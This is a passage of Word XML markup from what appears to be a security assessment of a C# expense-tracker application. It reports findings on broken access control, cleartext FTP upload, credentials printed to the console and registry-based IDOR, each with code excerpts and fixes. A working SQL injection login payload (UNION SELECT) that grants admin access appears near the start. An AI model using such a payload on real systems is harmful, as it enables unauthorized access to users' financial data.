      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">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username: ' UNION SELECT 1,'x','x','x',1,'x' --</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">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Step 2: num = (int)GetValue(4) = 1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag3 = false </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin() panel opens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">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Step 3: Admin panel loads getExpensesOfAll() — returns all users expenses with no filter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:spacing w:after="140" w:before="2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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figure 6a (F5: Broken Access Control)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">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840605" cy="2559050"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="22" name="Shape 22"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="2506825"/>
                          <a:ext cx="4827905" cy="254635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840605" cy="2559050"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21"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4840605" cy="2559050"/>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20">
      <w:pPr>
        <w:spacing w:after="20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6a — Screenshot (F5-PoC): UNION SELECT payload (UNION SELECT 1,'a','a','a',1 --) in Login form forces isadmin=1, opening Admin panel ("Welcome Admin") without valid admin credentials, confirming client-side role check is injectable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">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8"/>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12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The admin access decision is a single line: num != 1. Because the query is injectable (Finding 1), an attacker can craft a UNION payload that returns isadmin=1 regardless of their actual privilege level. There is no server-side re-verification of the role at any point in Admin.cs.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">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124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Enforce authorization server-side on every sensitive endpoint, not just at login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Issue signed JWT with role claim after authentication; re-verify on every Admin panel action</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Add explicit authorization attribute/decorator to all admin methods</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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28">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129">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19"/>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2A">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6  —  Cleartext FTP Data Transmission</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2C">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CWE-319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2D">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8.1  —  High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">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2F">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30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Admin.cs Lines 52–57: WebClient.UploadFile() with plain ftp:// URI — no TLS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Admin.cs Line 43: Upload("ftp://"+ftpserver, ...) — protocol explicitly FTP not FTPS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">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33">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2" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="3" name="Shape 3"/>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34">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4 (reused) — Admin.cs: WebClient FTP upload with no transport encryption</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">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36">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37">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Admin class uses System.Net.WebClient with a plain ftp:// URI to upload the expenses CSV backup. WebClient.UploadFile with STOR command uses standard FTP — no TLS negotiation, no FTPS implicit/explicit mode. Both credentials and file content are transmitted in cleartext.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>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138">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Admin.cs  Line 52–57  (Upload method)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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using (WebClient webClient = new WebClient())</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">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webClient.Credentials = new NetworkCredential(userName, password);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">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webClient.UploadFile(ftpServer + "/" + filename, "STOR", filename);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">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ftpServer = "ftp://" + this.ftpserver  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  plain FTP, no TLS</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">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21"/>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140">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Any host on the local network segment can passively capture the FTP credentials (USER/PASS commands) and the complete file content using a network sniffer. The expenses CSV contains financial records for all users. No certificate validation or transport encryption is applied.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">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142">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Replace FTP with SFTP (SSH.NET library or WinSCP .NET assembly) for encrypted transfer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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If FTP must be retained, use FTPS (FtpWebRequest with EnableSsl=true)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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45">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146">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22"/>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47">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7  —  Credentials Written to Console/Log Output</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4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CWE-532</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4A">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7.5  —  High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">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4C">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4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 30: Console.WriteLine(this.decryptedDBPassword)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 41: Console.WriteLine("Decrypted dbpassword: " + text4)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 54: Console.WriteLine(text5) — full connection string with password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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Admin.cs Lines 39,44: Console.WriteLine(pathtodownload) — temp file path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">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52">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3" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="4" name="Shape 4"/>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53">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8 — DBAccessClass.cs: 3 Console.WriteLine calls exposing password and connection string</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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55">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56">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decryptPassword() and openConnection() methods in DBAccessClass.cs contain Console.WriteLine calls that print the decrypted database password and the complete connection string (including password) to standard output on every database connection. These appear to be development debug statements never removed before release.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table23"/>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157">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DBAccessClass.cs  Lines 29–30</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">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this.decryptedDBPassword = Encoding.ASCII.GetString(bytes);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">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Console.WriteLine(this.decryptedDBPassword);  // </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">←</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SA PASSWORD TO STDOUT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">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5B">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Line 41</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">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Console.WriteLine("Decrypted dbpassword: " + text4);  // </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">←</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> AGAIN</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">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5E">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Line 54</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">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Console.WriteLine(text5);  // </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">←</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> FULL CONN STRING: Data Source=...Password=p@ssw0rd</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">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24"/>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16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On every database connection the SA password is printed to stdout three times and the full connection string once. Any logging agent, process monitor, ETW trace, or stdout pipe captures these credentials. The output includes the word "dbpassword" (sic) — confirming these are unremediated debug statements.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">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163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Remove all Console.WriteLine statements that reference passwords, keys, or connection strings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Implement a proper logging framework (NLog, log4net) with severity levels; never log credentials at any level</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Add SAST (static analysis) rule to CI/CD to flag any Console.Write containing connection string keywords</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">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67">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168">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25"/>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6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8  —  IDOR via Tampered Windows Registry Value</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6B">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CWE-639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6C">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7.5  —  High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">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6E">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6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Main.cs Line 103: string emailid = registryKey.GetValue("email") — untrusted registry value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Main.cs Line 104: dbaccessClass.viewExpenses(emailid) — no ownership check in DB layer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Main.cs Line 124: same pattern for clearExpenses(emailid)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
